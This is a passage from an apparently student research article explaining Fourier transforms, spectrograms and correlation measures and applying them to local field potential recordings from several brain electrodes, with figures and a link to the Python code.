<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.52-PM.png" alt="" class="wp-image-1208" width="472" height="111" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.52-PM.png 760w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.52-PM-300x70.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.52-PM-230x54.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.52-PM-350x82.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.52-PM-480x112.png 480w" sizes="(max-width: 472px) 100vw, 472px" /></figure>



<p>Where Y(ω) is the DFT of the signal x(t).</p>



<p>The spectral density obeys an important theorem, called the Parseval’s theorem which states that the integral of the spectral density equals the squared sum of the absolute value of the time signal, expressed in the following as-</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM.png" alt="" class="wp-image-1207" width="476" height="131" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM.png 922w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM-300x83.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM-768x212.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM-920x253.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM-230x63.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM-350x96.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM-480x132.png 480w" sizes="(max-width: 476px) 100vw, 476px" /></figure>



<p>In the above equation, we can notice one of the important features of this theorem is that the integral of the components in the frequency domain is equal to the sum of all components in the time domain.</p>



<h4 class="wp-block-heading">2.5 Short Time Fourier Transform</h4>



<p>Another type of the Fourier transform is the short time Fourier transform (STFT). This transform is used to measure the sinusoidal frequency and phase content of a particular window in the signal. This involves dividing the signals into shorter time segments of equal length and then computing the DFT on each segment separately. This shows us the Fourier of each segment individually. Then we plot this to see the changes in the spectra. Taking an example for a signal x(t). The short time Fourier transform of this signal is essentially the product of this function and a window function which is non zero for a particular period of time.&nbsp;</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.18.47-PM-1024x324.png" alt="" class="wp-image-1210" width="596" height="187" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.18.47-PM-300x95.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.18.47-PM-230x73.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.18.47-PM-350x111.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.18.47-PM-480x152.png 480w" sizes="(max-width: 596px) 100vw, 596px" /></figure>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-19.png" alt="" class="wp-image-1209" width="434" height="268" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-19.png 622w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-19-300x185.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-19-230x142.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-19-350x216.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-19-480x296.png 480w" sizes="(max-width: 434px) 100vw, 434px" /><figcaption><br>Fig 3: Several segments of the same signals are taken one after another and the DFT is computed for each of them</figcaption></figure></div>



<h2 class="wp-block-heading">3. Spectrogram</h2>



<p>The spectrogram is a 2-dimensional representation of the STFT where the time and frequency are expressed in the same plot on each of the two axes respectively. As we can see in Fig. 3, a shorter time segment of the original signal is considered. In the spectrogram, the squared&nbsp; absolute value of the power spectrum (i.e. the spectral energy density) of a segment is represented on the y axis and colored accordingly to its intensity. Consecutive DFTs are represented one after the other on the time axis vs frequency.</p>



<p>We consider the time signal shown in fig.4.  There is an active signal between the time period 0 and 3 seconds, after which there is zero frequency for one second length. Then the active signal continues from the 4th second and continues till the end of the signal.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-20-1024x204.png" alt="" class="wp-image-1211" width="540" height="107" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-1024x204.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-300x60.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-768x153.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-1536x306.png 1536w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-920x183.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-230x46.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-350x70.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-480x96.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20.png 1615w" sizes="(max-width: 540px) 100vw, 540px" /><figcaption><br>Fig 4: Time signal consisting of various frequencies.</figcaption></figure></div>



<p>Fig.5  represents the spectrogram of the time signal shown above. As depicted, there are various frequencies from the zeroth second till the third second. There is a gap in the frequencies corresponding to the gap in the signal above. This spectrogram shows which frequency has what value at precisely which instant of time. The four distinct yellow lines represent the highest of frequencies occurring in the time signal. The colour bar helps the reader understand the magnitude of the various frequencies present in it.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-21-1024x450.png" alt="" class="wp-image-1212" width="640" height="281" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-21-1024x450.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-21-300x132.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-21-768x338.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-21-920x404.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-21-230x101.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-21-350x154.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-21-480x211.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-21.png 1067w" sizes="(max-width: 640px) 100vw, 640px" /><figcaption><meta charset="utf-8">Fig 5: Spectrogram of the given time signal shown in Fig. 4.</figcaption></figure></div>



<h4 class="wp-block-heading">3.1 Time-Frequency Uncertainty Principle</h4>



<p>Coming to look at this spectrogram, we can wonder how one gets a precise value of the time or frequency component. There are several parameters we can adjust to achieve this precision. One of them being the size of the window we consider while taking the Fourier transform. If we have a narrow window, the temporal (time) precision will be high but there will be very few frequencies between 0 and Nyquist. As this window gets longer, there will be more frequencies so the frequency resolution will increase, but at the same time the temporal precision will decrease as the integration occurs over large periods of time. Therefore, there has to be a trade-off between the frequency resolution and the temporal resolution for us to attain a decent spectrogram.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-22.png" alt="" class="wp-image-1213" width="559" height="244" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-22.png 993w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-22-300x131.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-22-768x336.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-22-920x402.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-22-230x101.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-22-350x153.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-22-480x210.png 480w" sizes="(max-width: 559px) 100vw, 559px" /><figcaption><br>Fig 6: Time-Frequency Trade-off</figcaption></figure></div>



<p>Depending on the length of the window we consider, we can have two types of spectrograms – Narrowband spectrogram and a Wideband spectrogram.&nbsp;</p>



<h4 class="wp-block-heading">3.2 Narrowband Spectrum</h4>



<p>Narrowband spectrogram is where the window length is long. This means, there will be more points for computation of DFT. Therefore, more frequency resolution. The drawback here is that there is less time resolution as there are many points. As shown in the figure below, the frequency lines are very sharp, indicating exactly where these frequencies lie, but the time scale is not very clear.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-23.png" alt="" class="wp-image-1214" width="384" height="507" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-23.png 663w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-23-227x300.png 227w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-23-230x304.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-23-350x462.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-23-480x633.png 480w" sizes="(max-width: 384px) 100vw, 384px" /><figcaption><br>Fig 7: Narrowband spectrogram where the frequency resolution is very precise, but the time resolution is less accurate.</figcaption></figure></div>



<h4 class="wp-block-heading">3.3 Wideband Spectrum</h4>



<p>Wideband spectrum is where window length is short. This means, there are numerous time segments which account for precise location of transitions i.e., high time resolution. However, as the window is short, there are fewer DFT points which results in a poor frequency resolution. In Fig. 7, we can see that the timelines are very accurate but the frequency lines are vague and it is harder to identify the precise frequencies of the signal.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-24-1024x674.png" alt="" class="wp-image-1215" width="542" height="356" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-24-1024x674.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-24-300x197.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-24-768x505.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-24-920x605.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-24-230x151.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-24-350x230.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-24-480x316.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-24.png 1049w" sizes="(max-width: 542px) 100vw, 542px" /><figcaption><br>Fig 8: Wideband spectrogram where we can see exactly where the time events happen, but the frequency resolution is less accurate and frequency lines are blurry</figcaption></figure></div>



<h4 class="wp-block-heading">3.4 Neural Data Analysis of Brain Signal</h4>



<p>From this point forward, all the graphs and pictures have been derived from actual brain data. This data is the LFP signal from the brain of an animal when subjected to certain testing conditions.</p>



<h4 class="wp-block-heading">3.5 Local Field Potential</h4>



<p>The Local Field Potential is the electric potential recorded in the extracellular space around the neurons, typically using microneedles. They differ from electroencephalogram (EEG), which is recorded at the surface of the scalp with macro-electrodes.&nbsp;</p>



<p>When messages are transmitted from one neuron to another, there is a spike in potential known as action potential. This is what the LFP picks up. These are very refined signals as they are taken from such close proximity to the neurons, whereas in the case of the EEG, the signal must propagate through various media like the cranium, the cerebrospinal fluid, dura mater, muscle and skin. </p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-25.png" alt="" class="wp-image-1216" width="490" height="338" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-25.png 834w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-25-300x207.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-25-768x530.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-25-230x159.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-25-350x242.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-25-480x332.png 480w" sizes="(max-width: 490px) 100vw, 490px" /><figcaption><br>Fig.9:  Neural data taken from the same electrode: two different trials of the same experiment</figcaption></figure></div>



<p>The LFP data shown in Fig.9  is just two trials conducted for a particular experiment, recorded by the same electrode. Each signal corresponds to the data collected by a single electrode. These probes were located at different locations, but the data was taken during the same period of time. The cumulative of all the signals is shown in fig. 10.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-26.png" alt="" class="wp-image-1217" width="500" height="324" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-26.png 828w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-26-300x194.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-26-768x497.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-26-230x149.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-26-350x227.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-26-480x311.png 480w" sizes="(max-width: 500px) 100vw, 500px" /><figcaption><br>Fig.10:  LFP data of five trails.</figcaption></figure></div>



<p>The mean of all these trials is then used for computation of the spectrogram. Fig.11 represents the mean of all the signals in the five trials.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-27.png" alt="" class="wp-image-1218" width="497" height="351" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-27.png 804w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-27-300x212.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-27-768x543.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-27-230x162.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-27-350x247.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-27-480x339.png 480w" sizes="(max-width: 497px) 100vw, 497px" /><figcaption><br>Fig 11: Graph showing the mean LPF of different trials of an experiment</figcaption></figure></div>



<p>Figure 11 shows the LFP that varies with time. As we can see, the y-axis has both negative and positive voltages. From the zeroth second, the signal shoots up from  negative value of 4 to a positive value of 2, and then keeps on varying subsequently.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-28.png" alt="" class="wp-image-1219" width="570" height="365" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-28.png 842w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-28-300x192.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-28-768x493.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-28-230x148.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-28-350x224.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-28-480x308.png 480w" sizes="(max-width: 570px) 100vw, 570px" /><figcaption><br>Fig 12: This figure shows the DFT of the LFP signal shown in Fig. 10</figcaption></figure></div>



<p>The graph in Fig.12  shows the DFT of the signal depicted in Fig.11. The graph of the positive frequencies looks like a mirror image of the negative frequencies. This is because the DFT has both positive and negative components which are similar in magnitude.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-29.png" alt="" class="wp-image-1220" width="478" height="303" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-29.png 879w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-29-300x190.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-29-768x488.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-29-230x146.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-29-350x222.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-29-480x305.png 480w" sizes="(max-width: 478px) 100vw, 478px" /><figcaption><br>Fig 13: The expanded view of the DFT of Fig. 12  after eliminating the negative portion</figcaption></figure></div>



<p>The negative frequencies are eliminated and the positive ones are enhanced. As we can see, the graph is more readable now, the frequencies have distinguished values.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-30.png" alt="" class="wp-image-1221" width="483" height="316" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-30.png 806w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-30-300x197.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-30-768x503.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-30-230x151.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-30-350x229.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-30-480x314.png 480w" sizes="(max-width: 483px) 100vw, 483px" /><figcaption><br>Fig.14:  Spectrogram of the LFP data</figcaption></figure></div>



<p>The spectrogram of the given LFP data is depicted in Fig.14. The purple color indicates low frequencies whereas the blue, green and yellow colors indicate high frequencies.&nbsp;</p>



<h4 class="wp-block-heading">3.6 Correlation Function</h4>



<p>A useful tool for comparing two signals which are a function of time is the correlation function. It measures how similar two signals are. It is a function which is dependent on a certain amount of time shift. There are two types – autocorrelation and cross-correlation.&nbsp;</p>



<h4 class="wp-block-heading">3.7 Cross-Correlation</h4>



<p>Cross-correlation is defined as the correlation between a signal and a time shifted version of another signal. This is also known as the sliding dot product or sliding inner product. We can consider two signals x(t) and y(t) which are functions of time. The cross-correlation function can be written as-</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.35.05-PM.png" alt="" class="wp-image-1222" width="391" height="120" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.35.05-PM.png 654w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.35.05-PM-300x92.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.35.05-PM-230x70.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.35.05-PM-350x107.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.35.05-PM-480x147.png 480w" sizes="(max-width: 391px) 100vw, 391px" /></figure>



<p>Where s is the shift in time.</p>



<h4 class="wp-block-heading">3.8 Autocorrelation</h4>



<p>Autocorrelation, also known as serial correlation, is the correlation of a signal with a delayed version of itself. In other words, it is the observations of the time lag in the signal. In signal analysis we can use this to analyze functions or series of values. Considering the same example as above, we can write the autocorrelation functions as-</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.04-PM.png" alt="" class="wp-image-1224" width="395" height="110" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.04-PM.png 752w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.04-PM-300x84.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.04-PM-230x64.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.04-PM-350x98.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.04-PM-480x134.png 480w" sizes="(max-width: 395px) 100vw, 395px" /></figure>



<h4 class="wp-block-heading">3.9 Covariance</h4>



<p>Covariance is defined as the measure of correlation. In other words, covariance gives an exact number to the similarities between two variables. It is represented by eqn (x).</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.12-PM.png" alt="" class="wp-image-1226" width="484" height="207" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.12-PM.png 700w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.12-PM-300x129.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.12-PM-230x99.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.12-PM-350x150.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.12-PM-480x206.png 480w" sizes="(max-width: 484px) 100vw, 484px" /></figure>



<p>Where, x<sub>i</sub> and y<sub>i</sub> are data values of x and y respectively, x and y are mean values and N is the number of data values.</p>



<h4 class="wp-block-heading">3.10 Pearson Correlation</h4>



<p>Another method to calculate correlation is to find the Pearson coefficient. It is defined as the measure of linear correlation between two sets of data. As with covariance itself, the measure can only reflect a linear correlation of variables, and ignores many other types of relationship or correlation.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.29-PM.png" alt="" class="wp-image-1225" width="487" height="184" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.29-PM.png 682w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.29-PM-300x113.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.29-PM-230x87.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.29-PM-350x132.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.29-PM-480x182.png 480w" sizes="(max-width: 487px) 100vw, 487px" /></figure>



<p>Eqn.(xi) represents the formula to calculate the Pearson coefficient. From this we can obtain the correlation matrix as follows-</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.36-PM.png" alt="" class="wp-image-1223" width="472" height="137" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.36-PM.png 676w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.36-PM-300x87.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.36-PM-230x67.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.36-PM-350x101.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.36-PM-480x139.png 480w" sizes="(max-width: 472px) 100vw, 472px" /></figure>



<h4 class="wp-block-heading">3.11 Correlation Of Neural Data</h4>



<p>We consider two signals of the LFP data from two different electrodes, to calculate the correlation. The two signals are represented by two distinct colors. We can see how each of these signals changes with time, and how similar they are to each other.<br></p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-31.png" alt="" class="wp-image-1227" width="435" height="284" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-31.png 780w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-31-300x196.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-31-768x502.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-31-230x150.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-31-350x229.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-31-480x314.png 480w" sizes="(max-width: 435px) 100vw, 435px" /><figcaption><br>Fig 15: LFP data taken into consideration for calculation of correlation</figcaption></figure></div>



<p>We now calculate the correlation among the LFP signals acquired in 5 different electrodes at different brain locations and obtain the correlation matrix represented in Fig. 16. For simplicity, we restricted ourselves to only 5 electrodes for the computation of the correlation matrix.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-32-1024x217.png" alt="" class="wp-image-1228" width="536" height="114" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-32-1024x217.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-32-300x64.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-32-768x163.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-32-920x195.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-32-230x49.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-32-350x74.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-32-480x102.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-32.png 1108w" sizes="(max-width: 536px) 100vw, 536px" /><figcaption><br>Fig.16: Correlation matrix for LFP data</figcaption></figure></div>



<p>Note that the diagonal elements of the matrix are all ‘1’, since they are the correlation of a column with itself. Another point of observation is that this matrix is also symmetric as shown in Pearson correlation.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-33.png" alt="" class="wp-image-1229" width="443" height="316" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-33.png 707w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-33-300x214.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-33-230x164.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-33-350x250.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-33-480x342.png 480w" sizes="(max-width: 443px) 100vw, 443px" /><figcaption><br>Fig.17: Correlation plot for LFP data corresponding to 5 data points</figcaption></figure></div>



<p>Fig.17 shows the corresponding plot for the correlation matrix in Fig.16. The diagonal elements of the plot are shaded white: indicating high correlation, which is true because all the diagonal elements are one. On the contrary, the elements shaded as black have zero correlation. Taking the heat map as reference, we can locate which part of the signal has high correlation and which part does not.</p>



<p>Here below, we plot two LFP signals vs time that have small correlation in Fig. 17, these are the electrodes 1 and 2 which show low correlation in Fig. 17. This way we can conclude to what extent these signals are similar.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-34-1024x596.png" alt="" class="wp-image-1230" width="541" height="314" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-34-1024x596.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-34-300x175.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-34-768x447.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-34-920x535.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-34-230x134.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-34-350x204.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-34-480x279.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-34.png 1447w" sizes="(max-width: 541px) 100vw, 541px" /><figcaption><br>Fig.18: LFP data from electrode 1 and electrode 2</figcaption></figure></div>



<p>We can observe here in fig.18, these signals are not very similar: the correlation indeed is very small as one can observe from the correlation matrix for these electrodes.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-35-1024x595.png" alt="" class="wp-image-1231" width="526" height="305" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-35-1024x595.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-35-300x174.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-35-768x446.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-35-920x535.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-35-230x134.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-35-350x203.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-35-480x279.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-35.png 1449w" sizes="(max-width: 526px) 100vw, 526px" /><figcaption><br>Fig.19: LFP data from electrode 1 and 3</figcaption></figure></div>



<p>Fig.19 represents data which is much more similar than the data from Fig.18, these are electrodes 1 and 3. The peaks and dips of the signal from trail 1 are consistent with that of trial 2. Taking these observations into consideration, we can propose that the parts of the brain from where this data was taken, are connected or work in coordination when subjected to certain tasks. These two electrodes have, indeed, higher correlation as one can observe from the correlation matrix in Fig. 17.</p>



<h2 class="wp-block-heading">4. Coding</h2>



<p>All the graphs and plots in this paper have been coded using python. The codes for these respective figures can be found in the link given below-</p>



<p><a href="https://github.com/giti21/Neural-Data-Analysis">https://github.com/giti21/Neural-Data-Analysis</a></p>



<p></p>



<h2 class="wp-block-heading">5. References</h2>



<p>Mentor: Dr. Gino Del Ferraro, NYU</p>



